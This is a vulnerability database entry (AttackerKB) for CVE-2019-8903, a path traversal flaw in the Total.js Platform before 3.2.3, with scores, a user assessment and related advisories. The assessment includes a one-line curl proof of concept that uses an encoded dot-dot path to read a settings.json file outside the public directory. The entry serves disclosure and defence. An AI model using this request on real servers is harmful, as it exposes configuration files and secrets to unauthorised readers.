Lucene search
AttackerKBAKB:D1E7E4BF-380D-4BA0-87F6-75100C2B8BA2HistoryOct 30, 2019 - 12:00 a.m.
CVE-2019-8903
2019-10-3000:00:00
attackerkb.com
10
0.013 Low
EPSS
Percentile
85.8%
index.js in Total.js Platform before 3.2.3 allows path traversal.
Recent assessments:
Mad-robot at July 05, 2020 2:29pm UTC reported:
Totaljs – Unathenticated Directory Traversal
DESCRIPTION
User can make requests like “GET /…/databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.
Refer:-
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903>
PROOF OF CONCEPT
$ curl -v --path-as-is
http://127.0.0.1:8000/.%2e/databases/settings.json
#(note that .json is in the extensions list by def.)
Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 5
Related
nodejs
nodejs
Path Traversal
2019-06-28 14:17:06
nvd
nvd
CVE-2019-8903
2019-02-18 16:29:00
cve
cve
CVE-2019-8903
2019-02-18 16:29:00
openvas
openvas
Total.js Directory Traversal Vulnerability
2019-03-11 00:00:00
githubexploit
githubexploit
Exploit for Path Traversal in Totaljs Total.Js
2020-12-01 09:18:58
osv
osv
Path Traversal in total.js
2019-02-20 15:40:13
CVE-2019-8903
2019-02-18 16:29:00
cvelist
cvelist
CVE-2019-8903
2019-02-18 16:00:00
metasploit
metasploit
Total.js prior to 3.2.4 Directory Traversal
2019-03-10 16:57:24
nuclei
nuclei
Totaljs <3.2.3 - Local File Inclusion
2020-04-08 07:36:36
github
github
Path Traversal in total.js
2019-02-20 15:40:13
veracode
veracode
Path Traversal
2019-02-19 06:33:57
attackerkb
attackerkb
Total.js requestcontinue Directory Traversal Vulnerability
2019-02-18 00:00:00
prion
prion
Path traversal
2019-02-18 16:29:00